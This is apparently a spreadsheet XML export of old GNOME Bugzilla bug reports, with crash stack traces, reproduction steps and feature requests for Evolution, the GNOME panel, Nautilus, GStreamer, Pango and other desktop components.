Evolutions inability to synchronize some folders.
I don't know what I did exactly that would cause these problems.  The
program was running great for a couple of months so this might not be a
bug but rather a 'User induced' problem.
Debugging Information:
[New Thread 1024 (LWP 2109)]
[New Thread 2049 (LWP 2117)]
[New Thread 2051 (LWP 2119)]
[New Thread 3076 (LWP 2120)]
[New Thread 4101 (LWP 2175)]
0x40b1d519 in __wait4 () from /lib/i686/libc.so.6
#0  0x40b1d519 in __wait4 () from /lib/i686/libc.so.6
#1  0x40b8d9e4 in __DTOR_END__ () from /lib/i686/libc.so.6
#2  0x406cb563 in waitpid (pid=2197 stat_loc=0xbffff30c options=0)
    at wrapsyscall.c:172
#3  0x402e6262 in gnome_segv_handle (signum=11) at gnome-init.c:659
#4  0x08096ba6 in segv_redirect (sig=11) at main.c:67
#5  0x406c9935 in pthread_sighandler (signo=11 ctx=
      {gs = 7 __gsh = 0 fs = 0 __fsh = 0 es = 43 __esh = 0 ds = 43 __dsh = 0 edi = 136810328 esi = 15 ebp = 3221223136 esp = 3221223124 ebx = 136810448 edx = 26 ecx = 15 eax = 4294967292 trapno = 0 err = 0 eip = 1085547047 cs = 35 __csh = 0 eflags = 2097686 esp_at_signal = 3221223124 ss = 43 __ssh = 0 fpstate = 0xbffff458 oldmask = 2147483648 cr2 = 0}) at signals.c:97
#6  
#7  0x40b42227 in __poll (fds=0x8278f58 nfds=15 timeout=245)
    at ../sysdeps/unix/sysv/linux/poll.c:63
#8  0x4058ba74 in g_main_poll (timeout=245 use_priority=0 priority=0)
    at gmain.c:1034
#9  0x4058b465 in g_main_iterate (block=1 dispatch=1) at gmain.c:808
#10 0x4058b7e8 in g_main_run (loop=0x80f81a8) at gmain.c:935
#11 0x404a065b in gtk_main () at gtkmain.c:524
#12 0x408c2547 in bonobo_main () at bonobo-main.c:283
#13 0x08096d55 in main (argc=3 argv=0xbffff97c) at main.c:141
#14 0x40a7f177 in __libc_start_main (main=0x8096bd0  argc=3 
    ubp_av=0xbffff97c init=0x8064ddc  fini=0x80ca39c  
    rtld_fini=0x4000e184  stack_end=0xbffff974)
    at ../sysdeps/generic/libc-start.c:129
Thread 5 (Thread 4101 (LWP 2175)):
#0  0x40a908a5 in __sigsuspend (set=0x42dff92c)
    at ../sysdeps/unix/sysv/linux/sigsuspend.c:45
#1  0x406c90d9 in __pthread_wait_for_restart_signal (self=0x42dffc00)
    at pthread.c:934
#2  0x406c5c5c in pthread_cond_wait (cond=0x814ca30 mutex=0x814ca10)
    at restart.h:34
#3  0x4006eefc in e_msgport_wait (mp=0x814c9e8) at e-msgport.c:193
#4  0x4006f623 in thread_dispatch (din=0x814c998) at e-msgport.c:514
#5  0x406c6bfd in pthread_start_thread (arg=0x42dffc00) at manager.c:262
Thread 4 (Thread 3076 (LWP 2120)):
#0  0x40a908a5 in __sigsuspend (set=0x4244092c)
    at ../sysdeps/unix/sysv/linux/sigsuspend.c:45
#1  0x406c90d9 in __pthread_wait_for_restart_signal (self=0x42440c00)
    at pthread.c:934
#2  0x406c5c5c in pthread_cond_wait (cond=0x814cad8 mutex=0x814cab8)
    at restart.h:34
#3  0x4006eefc in e_msgport_wait (mp=0x814ca90) at e-msgport.c:193
#4  0x4006f623 in thread_dispatch (din=0x814ca40) at e-msgport.c:514
#5  0x406c6bfd in pthread_start_thread (arg=0x42440c00) at manager.c:262
Thread 3 (Thread 2051 (LWP 2119)):
#0  0x40a908a5 in __sigsuspend (set=0x41c4092c)
    at ../sysdeps/unix/sysv/linux/sigsuspend.c:45
#1  0x406c90d9 in __pthread_wait_for_restart_signal (self=0x41c40c00)
    at pthread.c:934
#2  0x406c5c5c in pthread_cond_wait (cond=0x814cad8 mutex=0x814cab8)
    at restart.h:34
#3  0x4006eefc in e_msgport_wait (mp=0x814ca90) at e-msgport.c:193
#4  0x4006f623 in thread_dispatch (din=0x814ca40) at e-msgport.c:514
#5  0x406c6bfd in pthread_start_thread (arg=0x41c40c00) at manager.c:262
Thread 2 (Thread 2049 (LWP 2117)):
#0  0x40b42227 in __poll (fds=0x8152544 nfds=1 timeout=2000)
    at ../sysdeps/unix/sysv/linux/poll.c:63
#1  0x406c6900 in __pthread_manager (arg=0x1d) at manager.c:136
Thread 1 (Thread 1024 (LWP 2109)):
#0  0x40b1d519 in __wait4 () from /lib/i686/libc.so.6
#1  0x40b8d9e4 in __DTOR_END__ () from /lib/i686/libc.so.6
#2  0x406cb563 in waitpid (pid=2197 stat_loc=0xbffff30c options=0)
    at wrapsyscall.c:172
#3  0x402e6262 in gnome_segv_handle (signum=11) at gnome-init.c:659
#4  0x08096ba6 in segv_redirect (sig=11) at main.c:67
#5  0x406c9935 in pthread_sighandler (signo=11 ctx=
      {gs = 7 __gsh = 0 fs = 0 __fsh = 0 es = 43 __esh = 0 ds = 43 __dsh = 0 edi = 136810328 esi = 15 ebp = 3221223136 esp = 3221223124 ebx = 136810448 edx = 26 ecx = 15 eax = 4294967292 trapno = 0 err = 0 eip = 1085547047 cs = 35 __csh = 0 eflags = 2097686 esp_at_signal = 3221223124 ss = 43 __ssh = 0 fpstate = 0xbffff458 oldmask = 2147483648 cr2 = 0}) at signals.c:97
#6  
#7  0x40b42227 in __poll (fds=0x8278f58 nfds=15 timeout=245)
    at ../sysdeps/unix/sysv/linux/poll.c:63
#8  0x4058ba74 in g_main_poll (timeout=245 use_priority=0 priority=0)
    at gmain.c:1034
#9  0x4058b465 in g_main_iterate (block=1 dispatch=1) at gmain.c:808
#10 0x4058b7e8 in g_main_run (loop=0x80f81a8) at gmain.c:935
#11 0x404a065b in gtk_main () at gtkmain.c:524
#12 0x408c2547 in bonobo_main () at bonobo-main.c:283
#13 0x08096d55 in main (argc=3 argv=0xbffff97c) at main.c:141
#14 0x40a7f177 in __libc_start_main (main=0x8096bd0  argc=3 
    ubp_av=0xbffff97c init=0x8064ddc  fini=0x80ca39c  
    rtld_fini=0x4000e184  stack_end=0xbffff974)
    at ../sysdeps/generic/libc-start.c:129
#0  0x40b1d519 in __wait4 () from /lib/i686/libc.so.6
#0  0x40b1d519 in __wait4 () from /lib/i686/libc.so.6
No locals.
#1  0x40b8d9e4 in __DTOR_END__ () from /lib/i686/libc.so.6
No symbol table info available.
#2  0x406cb563 in waitpid (pid=2197 stat_loc=0xbffff30c options=0)
    at wrapsyscall.c:172
	in wrapsyscall.c
stat_loc = (int *) 0xbffff30c
options = 0
result = 0
oldtype = 0
#3  0x402e6262 in gnome_segv_handle (signum=11) at gnome-init.c:659
	in gnome-init.c
estatus = 136419424
in_segv = 1
pid = 0
#4  0x08096ba6 in segv_redirect (sig=11) at main.c:67
	in main.c
sig = 11
#5  0x406c9935 in pthread_sighandler (signo=11 ctx=
      {gs = 7 __gsh = 0 fs = 0 __fsh = 0 es = 43 __esh = 0 ds = 43 __dsh = 0 edi = 136810328 esi = 15 ebp = 3221223136 esp = 3221223124 ebx = 136810448 edx = 26 ecx = 15 eax = 4294967292 trapno = 0 err = 0 eip = 1085547047 cs = 35 __csh = 0 eflags = 2097686 esp_at_signal = 3221223124 ss = 43 __ssh = 0 fpstate = 0xbffff458 oldmask = 2147483648 cr2 = 0}) at signals.c:97
	in signals.c
signo = 0
__value = 0x8096b84 U\211Ã¥SP\213]\bÃ¨\223\017Ã½Ã¿\213\025ÃI\016\b9Ãu\025\203Ã¬\fSÂ¡Â¨C\016\bÃ¿Ã\203Ã„\020\213]Ã¼Ã‰Ãƒ\211Ã¶\203Ã¬\bSRÃ¨\032Ã¸Ã¼Ã¿\203Ã„\020Ã‡E\b
#6  
No locals.
#7  0x40b42227 in __poll (fds=0x8278f58 nfds=15 timeout=245)
    at ../sysdeps/unix/sysv/linux/poll.c:63
	in ../sysdeps/unix/sysv/linux/poll.c
fds = (struct pollfd *) 0x8278f58
nfds = 3221222156
timeout = 0
resultvar = 136810328
Unknown reporter: jeffperrin@shaw.ca changed to bugbuddy-import@ximian.com.
</t>
  </si>
  <si>
    <t>jeffperrin</t>
  </si>
  <si>
    <t>GNOME-CORE-69571</t>
  </si>
  <si>
    <t>panel</t>
  </si>
  <si>
    <t>GNOME-CORE</t>
  </si>
  <si>
    <t>Invoking Run from Panel menu crashes Panel</t>
  </si>
  <si>
    <t xml:space="preserve">Package: gnome-core
Severity: major
Version: 1.5.4
Synopsis: Invoking Run from Panel menu crashes Panel
Bugzilla-Product: gnome-core
Bugzilla-Component: panel
BugBuddy-GnomeVersion: 2.0 (1.109.0)
Description:
Description of Problem:
Steps to reproduce the problem:
1. Launch gnome-panel-2
2. From foot menu select 1
3. There is no step 3
Actual Results:
Panel crashes
Can no longer gain focus of terminal which launched panel.
Expected Results:
Panel brings up run dialog
How often does this happen? 
Every time
Additional Information:
Debugging Information:
(no debugging symbols found)...Retry #1:
Retry #2:
Retry #3:
Retry #4:
[New LWP 1]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0xfdd9cde8 in _waitid () from /usr/lib/libc.so.1
#0  0xfdd9cde8 in _waitid () from /usr/lib/libc.so.1
#1  0xfdd5663c in _waitpid () from /usr/lib/libc.so.1
#2  0xfdf5ef28 in waitpid () from /usr/lib/libthread.so.1
#3  0xff18b0e8 in libgnomeui_segv_handle ()
   from /opt/gnome-2.0/lib/libgnomeui-2.so.0
#4  0xfdf65c50 in __sighndlr () from /usr/lib/libthread.so.1
#5  0xfdf5fb5c in call_user_handler () from /usr/lib/libthread.so.1
#6  
Thread 1 (LWP 1):
#0  0xfdd9cde8 in _waitid () from /usr/lib/libc.so.1
#1  0xfdd5663c in _waitpid () from /usr/lib/libc.so.1
#2  0xfdf5ef28 in waitpid () from /usr/lib/libthread.so.1
#3  0xff18b0e8 in libgnomeui_segv_handle ()
   from /opt/gnome-2.0/lib/libgnomeui-2.so.0
#4  0xfdf65c50 in __sighndlr () from /usr/lib/libthread.so.1
#5  0xfdf5fb5c in call_user_handler () from /usr/lib/libthread.so.1
#6  
#0  0xfdd9cde8 in _waitid () from /usr/lib/libc.so.1
No symbol table info available.
#1  0xfdd5663c in _waitpid () from /usr/lib/libc.so.1
No symbol table info available.
#2  0xfdf5ef28 in waitpid () from /usr/lib/libthread.so.1
No symbol table info available.
#3  0xff18b0e8 in libgnomeui_segv_handle ()
   from /opt/gnome-2.0/lib/libgnomeui-2.so.0
No symbol table info available.
#4  0xfdf65c50 in __sighndlr () from /usr/lib/libthread.so.1
No symbol table info available.
#5  0xfdf5fb5c in call_user_handler () from /usr/lib/libthread.so.1
No symbol table info available.
#6  
No symbol table info available.
------- Bug moved to this database by unknown@bugzilla.gnome.org 2002-01-24 13:00 -------
Reassigning to the default owner of the component panel-maint@bugzilla.gnome.org.
</t>
  </si>
  <si>
    <t>panel-maint</t>
  </si>
  <si>
    <t>brian.nitz</t>
  </si>
  <si>
    <t>EVOLUTION-271403</t>
  </si>
  <si>
    <t>Cut and Paste subject in new message</t>
  </si>
  <si>
    <t xml:space="preserve">Distribution: Fedora Core release 1 (Yarrow)
Package: Evolution
Priority: Normal
Version: GNOME2.4.0 1.4.5
Gnome-Distributor: GNOME.Org
Synopsis: Cut and Paste subject in new message
Bugzilla-Product: Evolution
Bugzilla-Component: Miscellaneous
Bugzilla-Version: 1.4.5
Description:
Description of Problem:
Ctrl-v and Edit - Paste do not work to paste a subject in a new message
Steps to reproduce the problem:
1. Open a new message
2. type some junk in the To: field
3. tab to the subject field
4. hit ctrl-v
5. or go to Edit then Paste
6. damn!  a bug
Actual Results:
The contents of the clipboard are pasted to the message body
Expected Results:
The contents of the clipboard should be pasted ot the Subject:
How often does this happen?
Every time I try to paste a subject in an e-mail
Additional Information:
Good work.  Everything else works great!
Unknown reporter: matthew@695online.com changed to bugbuddy-import@ximian.com.
Setting qa contact to the default for this product.
   This bug either had no qa contact or an invalid one.
</t>
  </si>
  <si>
    <t>GSTREAMER-636699</t>
  </si>
  <si>
    <t>gst-plugins-good</t>
  </si>
  <si>
    <t>[PLUGIN-MOVE] qtmux: move to -good</t>
  </si>
  <si>
    <t>Should fit requirements i.e. has unit test documentation and is already used extensively in production.
There are some bugs filed against it though no more so than on other components in -good or -base.  Moreover most if not all of these actually require core (or 0.11) changes (e.g. downstream seekability sparse stream / newsegment handling).</t>
  </si>
  <si>
    <t>mnauw</t>
  </si>
  <si>
    <t>PANGO-108260</t>
  </si>
  <si>
    <t>PANGO</t>
  </si>
  <si>
    <t>segfault causing off-by-one error</t>
  </si>
  <si>
    <t>In pango_coverage_set if block_index is a multiple of N_BLOCKS_INCREMENT
the calculated value of coverage-&gt;n_blocks is too small. For example if
block_index == 512 coverage-&gt;n_blocks is set to 512 but it needs to be
greater than 512. Attaching patch.</t>
  </si>
  <si>
    <t>EMPATHY-641662</t>
  </si>
  <si>
    <t>Meta Contacts</t>
  </si>
  <si>
    <t>EMPATHY</t>
  </si>
  <si>
    <t>Update for libfolks API changes to IndividualAggregator.add_persona_from_details</t>
  </si>
  <si>
    <t>+++ This bug was initially created as a clone of Bug #629078 +++
The only thing that stands out to me now (beyond what's covered in bug #639933
and bug #640092) is this function:
IndividualAggregator.add_persona_from_details (Folks.Individual? parent string
persona_store_type string persona_store_id GLib.HashTable
details)
I think we should replace the persona_store_type and persona_store_id arguments
with a PersonaStore argument. Clients can find the PersonaStore on their own
via BackendStore.get_backend_by_name() Backend.persona_stores and have
tighter control over the selection process (which is otherwise too opaque I
think).</t>
  </si>
  <si>
    <t>empathy-maint</t>
  </si>
  <si>
    <t>NAUTILUS-330611</t>
  </si>
  <si>
    <t>Extension Library</t>
  </si>
  <si>
    <t>slow network browsing</t>
  </si>
  <si>
    <t>Please describe the problem:
Nautilus hogs the CPU and might lock up the other folder windows when using a
slow remote folder (such as a ftp/sftp mount).
Steps to reproduce:
1. open the places menu connect to server
2. login to sourceforge through SSH
3. browse that new network mount you just set up
Actual results:
Death by lag. File operations are so slow you can get a mug of coffee before
being able to move to the folder you need and change permissions on any file.
Now here is the real problem: nautilus nearly fully locks up. Yes browsing a
slow network share can and might be allowed to make the network share's
nautilus window to lag. HOWEVER the other nautilus windows (which are locally
open) are either slow or not responding while you are waiting for a remote
operation to finish. This should not happen.
Expected results:
Not lock up the entire nautilus process.
Does this happen every time?
Yes
Other information:
Could nautilus' handling of ftp:// and sftp:// protocols be done in a separate
process?</t>
  </si>
  <si>
    <t>TOTEM-144263</t>
  </si>
  <si>
    <t>TOTEM</t>
  </si>
  <si>
    <t>bug pendant l'Ã©coute d'un CD</t>
  </si>
  <si>
    <t>Durant l'Ã©coute d'un CD avec Totem Media Player J'ai eu le message d'erreur 
suivant L'application Totem (processus 2356) s'est bloquÃ©e Ã  la suite d'une 
erreur fatale (segmentation fault) Cette erreur est survenue aprÃ¨s quelques 
instants d'Ã©coute et non au lancement de Totem media player.</t>
  </si>
  <si>
    <t>totem-general-maint</t>
  </si>
  <si>
    <t>jsimonnot</t>
  </si>
  <si>
    <t>GLIBMM-354556</t>
  </si>
  <si>
    <t>GLIBMM</t>
  </si>
  <si>
    <t>wrap g_get_user_x_dir() functions</t>
  </si>
  <si>
    <t>There are a few miscellaneous utility functions in glib that are unwrapped in glibmm including: g_get_user_data_dir() g_get_user_config_dir() and g_get_user_cache_dir().  This patch wraps these in the Glib namespace.  It also changes the reference doc makefile to rebuild the documentation when a header file in glib/glibmm/ is changed but I can remove this part if desired.
Is it ok at add this API or do we have to branch first?</t>
  </si>
  <si>
    <t>gtkmm-forge</t>
  </si>
  <si>
    <t>EVOLUTION-301885</t>
  </si>
  <si>
    <t>Calendar</t>
  </si>
  <si>
    <t>Evolution crash when shift locale calendar view several times.</t>
  </si>
  <si>
    <t>Steps to reproduce:
1. launch evolution enable accessibility and start gnopernicus
2.  go to local calendar change calendar view among Day Work week and Week
one to another
Stack trace:
#0  0xffffe410 in ?? ()
#1  0xbfffc0fc in ?? ()
#2  0x00000000 in ?? ()
#3  0xbfffc030 in ?? ()
#4  0x410d0eeb in __waitpid_nocancel () from /lib/tls/libpthread.so.0
#5  0x40615ea0 in libgnomeui_segv_handle (signum=11) at gnome-ui-init.c:741
#6  0x08064a81 in segv_redirect (sig=11) at main.c:428
#7  
#8  0x412041da in IA__g_type_check_instance_cast (type_instance=0x8838be0
iface_type=80) at gtype.c:3161
#9  0x4183b0eb in ea_day_view_main_item_ref_child (accessible=0x84cd630
index=10) at ea-day-view-main-item.c:364
#10 0x4183bffe in table_interface_ref_at (table=0x84cd630 row=10 column=0) at
ea-day-view-main-item.c:696
#11 0x411636f1 in atk_table_ref_at (table=Variable table is not available.
) at atktable.c:157
Other information:</t>
  </si>
  <si>
    <t>liyuan</t>
  </si>
  <si>
    <t>GALEON-110414</t>
  </si>
  <si>
    <t>GALEON</t>
  </si>
  <si>
    <t>Download progressbar moves to fast wastes lots of CPU</t>
  </si>
  <si>
    <t>http://bugs.debian.org/187819 reports
Version: 1.3.3.20030401-1
Severity: normal
Galeon2's downloader when downloading a file of unknown size bounces a
section of the progress back and forth in a fairly typical fashion.
However it does so based on download rate at 40K/sec it moves way too
fast and wastes a ton of CPU even with a GTK2 theme involving no
pixmaps or other expensive drawing ops.</t>
  </si>
  <si>
    <t>galeon-maint</t>
  </si>
  <si>
    <t>mh</t>
  </si>
  <si>
    <t>BEAGLE-166768</t>
  </si>
  <si>
    <t>BEAGLE</t>
  </si>
  <si>
    <t>RTF files doesn't get hit on content search.</t>
  </si>
  <si>
    <t>Please describe the problem:
RTF files doesn't get hit when searched using any of the words present in the
document.  A beagled/beagle-extract-content displayed (no content)
Steps to reproduce:
1. Create a RTF document.
2. Let Beagle indexes it.
3. Using BEST search using any of the words present in the document.
4. or go to beagled in the beagle source tree.
5. Do a ./beagle-extract-content 
Actual results:
Steps 1-3: BEST doesn't show the RTF document.
Steps 4-5: beagle-extract-content shows (no content)
Expected results:
BEST to show the document in the hitlist.
beagle-extract-content to show the contents of the file.
Does this happen every time?
Yes
Other information:</t>
  </si>
  <si>
    <t>vvaradhan</t>
  </si>
  <si>
    <t>BUGZILLA.GNOME.ORG-391113</t>
  </si>
  <si>
    <t>[obsolete] bug-buddy parsing</t>
  </si>
  <si>
    <t>BUGZILLA.GNOME.ORG</t>
  </si>
  <si>
    <t>should reject oversized bug reports</t>
  </si>
  <si>
    <t>+++ This bug was initially created as a clone of Bug #391112 +++
Bug 391099 has a stack &gt; 40000 frames deep which is of course completely useless. While bug-buddy should limit stack traces to a sensible depth (filed as bug 391112) the bug importer should also reject bug reports that just are too big. (The bugmail generated by this bug is 1.5 MiB ! and brings my evo to its knees trying to display it...)</t>
  </si>
  <si>
    <t>bugzilla-maint</t>
  </si>
  <si>
    <t>GSTREAMER-458629</t>
  </si>
  <si>
    <t>[avidemux] high memory usage for many index entries</t>
  </si>
  <si>
    <t>Avidemux builds the index as a list and then sorts it into an array. This leads to a hight peak memory usage. Clips can easily use 20 mb for the index. So we touch 40 mb of memory before even going to playing. Imho working on the list is just fine. Seeking is not the usual usecase and going from one entry to the next is equaly fast with a sorted list.</t>
  </si>
  <si>
    <t>ensonic</t>
  </si>
  <si>
    <t>GTKHTML-251212</t>
  </si>
  <si>
    <t>Rendering</t>
  </si>
  <si>
    <t>GTKHTML</t>
  </si>
  <si>
    <t>Wrong font size</t>
  </si>
  <si>
    <t>GTKHTML from CVS (for Evolution from HEAD) has suddenly decided to use the
wrong font size.
My GTK+ font is 7.7pt as 8pt is too large and 7pt is too small.  However
the gtkhtml widget in Evolution's composer has taken my font size and
converted it to an integer.  This results in fonts which are too small to read.
Note that the gtkhtml used with evo1.4 (3.0.9) does not do this.</t>
  </si>
  <si>
    <t>gtkhtml-maintainers</t>
  </si>
  <si>
    <t>GNOME-LIBS-81130</t>
  </si>
  <si>
    <t>libgnomeui</t>
  </si>
  <si>
    <t>GNOME-LIBS</t>
  </si>
  <si>
    <t>Changing the font filter while having a font display crashes</t>
  </si>
  <si>
    <t xml:space="preserve">Package: gtk+
Severity: normal
Version: 0.1
Synopsis: Changing the font filter while having a font display crashes
Bugzilla-Product: gtk+
Bugzilla-Component: gtk
Description:
I was using the theme selector capplet to select a new global font. 
When changing the filter settings such that they would exclude the font
I was currently previewing the capplet crashed.
Debugging Information:
(no debugging symbols found)...0x40738319 in __wait4 () from /lib/libc.so.6
#0  0x40738319 in __wait4 () from /lib/libc.so.6
#1  0x407b4750 in __DTOR_END__ () from /lib/libc.so.6
#2  0x400e07b2 in gnome_segv_handle (signum=11) at gnome-init.c:664
#3  
#4  gnome_font_picker_font_extract_attr (font_name=0x0 attr=0x0 i=2)
    at gnome-font-picker.c:742
#5  0x400d1d33 in gnome_font_picker_update_font_info (gfp=0x80ac268)
    at gnome-font-picker.c:834
#6  0x400d17c6 in gnome_font_picker_dialog_ok_clicked (widget=0x80e8be0 
    data=0x80ac268) at gnome-font-picker.c:643
#7  0x40380a9b in gtk_marshal_NONE__NONE (object=0x80e8be0 
    func=0x400d1774  
    func_data=0x80ac268 args=0xbfffdfe0) at gtkmarshal.c:312
#8  0x403b00ee in gtk_handlers_run (handlers=0x805b7f8 signal=0xbfffdf80 
    object=0x80e8be0 params=0xbfffdfe0 after=0) at gtksignal.c:1917
#9  0x403af54f in gtk_signal_real_emit (object=0x80e8be0 signal_id=79 
    params=0xbfffdfe0) at gtksignal.c:1477
#10 0x403ad5c4 in gtk_signal_emit (object=0x80e8be0 signal_id=79)
    at gtksignal.c:552
#11 0x4031e540 in gtk_button_clicked (button=0x80e8be0) at gtkbutton.c:336
#12 0x4031fab6 in gtk_real_button_released (button=0x80e8be0)
    at gtkbutton.c:861
#13 0x40380a9b in gtk_marshal_NONE__NONE (object=0x80e8be0 
    func=0x4031fa10  func_data=0x0 args=0xbfffe370)
    at gtkmarshal.c:312
#14 0x403af3fb in gtk_signal_real_emit (object=0x80e8be0 signal_id=78 
    params=0xbfffe370) at gtksignal.c:1440
#15 0x403ad5c4 in gtk_signal_emit (object=0x80e8be0 signal_id=78)
    at gtksignal.c:552
#16 0x4031e484 in gtk_button_released (button=0x80e8be0) at gtkbutton.c:327
#17 0x4031f42b in gtk_button_button_release (widget=0x80e8be0 event=0x80b4160)
    at gtkbutton.c:721
#18 0x40380871 in gtk_marshal_BOOL__POINTER (object=0x80e8be0 
    func=0x4031f368  func_data=0x0 
    args=0xbfffe710) at gtkmarshal.c:28
#19 0x403af58f in gtk_signal_real_emit (object=0x80e8be0 signal_id=27 
    params=0xbfffe710) at gtksignal.c:1492
#20 0x403ad5c4 in gtk_signal_emit (object=0x80e8be0 signal_id=27)
    at gtksignal.c:552
#21 0x403e48a4 in gtk_widget_event (widget=0x80e8be0 event=0x80b4160)
    at gtkwidget.c:2864
#22 0x403807e8 in gtk_propagate_event (widget=0x80e8be0 event=0x80b4160)
    at gtkmain.c:1378
#23 0x4037f9a5 in gtk_main_do_event (event=0x80b4160) at gtkmain.c:818
#24 0x4043310f in gdk_event_dispatch (source_data=0x0 
    current_time=0xbfffeae0 user_data=0x0) at gdkevents.c:2139
#25 0x405e8055 in g_main_dispatch (dispatch_time=0xbfffeae0) at gmain.c:656
#26 0x405e8659 in g_main_iterate (block=1 dispatch=1) at gmain.c:877
#27 0x405e87e8 in g_main_run (loop=0x80b30a8) at gmain.c:935
#28 0x4037f2ab in gtk_main () at gtkmain.c:524
#29 0x0804cbe0 in main ()
#30 0x406a0316 in __libc_start_main (main=0x804cb5c  argc=1 
    ubp_av=0xbfffebd4 init=0x804af0c  fini=0x804f0e0  
    rtld_fini=0x4000d2fc  stack_end=0xbfffebcc)
    at ../sysdeps/generic/libc-start.c:129
#0  0x40738319 in __wait4 () from /lib/libc.so.6
No locals.
#1  0x407b4750 in __DTOR_END__ () from /lib/libc.so.6
No symbol table info available.
#2  0x400e07b2 in gnome_segv_handle (signum=11) at gnome-init.c:664
	in gnome-init.c
estatus = 135098276
in_segv = 1
pid = 0
#3  
No locals.
#4  gnome_font_picker_font_extract_attr (font_name=0x0 attr=0x0 i=2)
    at gnome-font-picker.c:742
	in gnome-font-picker.c
font_name = (gchar *) 0xfffffe00 
attr = (gchar *) 0x80ac268 Ã¸Ã€\n\bÃŒ\r\021
i = 0
pTmp = (gchar *) 0xfffffe00 
#5  0x400d1d33 in gnome_font_picker_update_font_info (gfp=0x80ac268)
    at gnome-font-picker.c:834
834	in gnome-font-picker.c
gfp = (GnomeFontPicker *) 0x80ac268
pTmp = (gchar *) 0x0
#6  0x400d17c6 in gnome_font_picker_dialog_ok_clicked (widget=0x80e8be0 
    data=0x80ac268) at gnome-font-picker.c:643
643	in gnome-font-picker.c
data = 0x80ac268
gfp = (GnomeFontPicker *) 0x80ac268
#7  0x40380a9b in gtk_marshal_NONE__NONE (object=0x80e8be0 
    func=0x400d1774  
    func_data=0x80ac268 args=0xbfffdfe0) at gtkmarshal.c:312
	in gtkmarshal.c
No locals.
------- Bug moved to this database by unknown@bugzilla.gnome.org 2002-05-08 05:01 -------
The original reporter (jeremy@goop.org) of this bug does not have an account here.
Reassigning to the exporter unknown@bugzilla.gnome.org.
Reassigning to the default owner of the component gtk-bugs@gtk.org.
</t>
  </si>
  <si>
    <t>gnome-libs-maint</t>
  </si>
  <si>
    <t>NAUTILUS-424691</t>
  </si>
  <si>
    <t>File and Folder Operations</t>
  </si>
  <si>
    <t>Keyring password dialog should be modal</t>
  </si>
  <si>
    <t>When Nautilus pops-up the window asking for a keyring password the underlying Nautilus window should be inaccesible (no pressing back button etc.). Otherwise there can be situations where user doesn't see the keyring window and is wondering why Nautilus is constantly loading (Gnome footprint waving its toes).
Other information:
This situation happened for me with dual screen set-up. Nautilus opens keyring dialog on the wrong monitor when I tried to access Samba share. Because I didn't spot the dialog I was wondering why Samba is not working. Nautilus didn't give any kind of feedback that Keyring dialog had been opened.</t>
  </si>
  <si>
    <t>mikko</t>
  </si>
  <si>
    <t>DIA-300744</t>
  </si>
  <si>
    <t>win32</t>
  </si>
  <si>
    <t>DIA</t>
  </si>
  <si>
    <t>New view -&gt; close original window -&gt; crash</t>
  </si>
  <si>
    <t>Steps to reproduce:
1. start dia
2. select new view
3. close original window
Stack trace:
Assertion failed
diagram.c line 85
dia-&gt;displays == NULL
Other information:</t>
  </si>
  <si>
    <t>sdteffen</t>
  </si>
  <si>
    <t>lode.leroy</t>
  </si>
  <si>
    <t>GIMP-131490</t>
  </si>
  <si>
    <t>GIMP</t>
  </si>
  <si>
    <t>The plugindetails and DB browser plug-ins look ugly</t>
  </si>
  <si>
    <t>These two plug-ins were made a long time ago and do not fully use Pango or
any GTK-2.x enhancements.
Some graphists (or at least some people with a good artistic sense) should
redesign the layout.  I do volonteer to code the layout then.</t>
  </si>
  <si>
    <t>dindinx</t>
  </si>
  <si>
    <t>SOUND-JUICER-127491</t>
  </si>
  <si>
    <t>interface</t>
  </si>
  <si>
    <t>Question mark in column header looks a little odd</t>
  </si>
  <si>
    <t>The question mark in Extract? in the track_listview column header looks a
little strange.  Since the point of sound-juicer is to extract files from
CDs I think it is clear to the user that selecting the checkbox marks that
track for extraction and deselecting the checkbox does the opposite.  I
don't recall seeing question marks in the column headers of other programs
with similar checkbox tree views.</t>
  </si>
  <si>
    <t>sound-juicer-maint</t>
  </si>
  <si>
    <t>bfox</t>
  </si>
  <si>
    <t>GNOME-PANEL-94270</t>
  </si>
  <si>
    <t>GNOME-PANEL</t>
  </si>
  <si>
    <t>Bogus space in 24-hour format</t>
  </si>
  <si>
    <t>Currently there seems to be an extra space between the time and date when
you select 24-hour mode as opposed to 12-hour mode.</t>
  </si>
  <si>
    <t>gnome-panel-maint</t>
  </si>
  <si>
    <t>calum.benson</t>
  </si>
  <si>
    <t>GSTREAMER-341715</t>
  </si>
  <si>
    <t>gst-libav</t>
  </si>
  <si>
    <t>'Element doesn't implement handling of this stream. Please file a bug'</t>
  </si>
  <si>
    <t>Please describe the problem:
When trying to play a certain M4A file:
$ gst-launch -v playbin uri=file:///home/sam/bad.m4a
Setting pipeline to PAUSED ...
/playbin0/decoder.sink: caps = NULL
/playbin0/decoder/typefind.src: caps = audio/x-m4a
Pipeline is PREROLLING ...
ERROR: from element /playbin0/decoder/ffdemux_aac0: Element doesn't implement
handling of this stream. Please file a bug.
Additional debug info:
gstffmpegdemux.c(987): gst_ffmpegdemux_sink_activate ():
/playbin0/decoder/ffdemux_aac0:
failed to activate sinkpad in pull mode push mode not implemented yet
ERROR: pipeline doesn't want to preroll.
Setting pipeline to NULL ...
/playbin0/decoder/ffdemux_mov_mp4_m4a_3gp_3g20.audio_00: caps = NULL
/playbin0/decoder/typefind.src: caps = NULL
FREEING pipeline ...
Steps to reproduce:
Actual results:
Expected results:
Does this happen every time?
Other information:</t>
  </si>
  <si>
    <t>GNOME-TERMINAL-71445</t>
  </si>
  <si>
    <t>GNOME-TERMINAL</t>
  </si>
  <si>
    <t>Rearrange how you create/delete profiles</t>
  </si>
  <si>
    <t>- change the new/delete profile menu items to manage profile have a
  dialog that lets you add/delete/edit profiles</t>
  </si>
  <si>
    <t>GAZPACHO-313516</t>
  </si>
  <si>
    <t>GAZPACHO</t>
  </si>
  <si>
    <t>Bug report improvements</t>
  </si>
  <si>
    <t>We need to improve the bug reports the current dialog is a little bit confusing
and the data is not represented in a good way.
Title should probably be changed to only contain exception string.
We need to include Gtk &amp; PyGTK version. Perhaps some distribution sniffing
aswell. Or at least provide the user with an option to choose the distribution
(on linux)</t>
  </si>
  <si>
    <t>gazpacho-maint</t>
  </si>
  <si>
    <t>johan</t>
  </si>
  <si>
    <t>EVOLUTION-204103</t>
  </si>
  <si>
    <t>Publish Availability causes wombat crash</t>
  </si>
  <si>
    <t>Program received signal SIGSEGV Segmentation fault.
0x4075ab6b in ORBit_send_system_exception (send_buffer=0x81240c8 
    ev=0xbffff97c) at env.c:289
289
env.c: No such file or directory.
#0  0x4075ab6b in ORBit_send_system_exception (send_buffer=0x81240c8 
    ev=0xbffff97c) at env.c:289
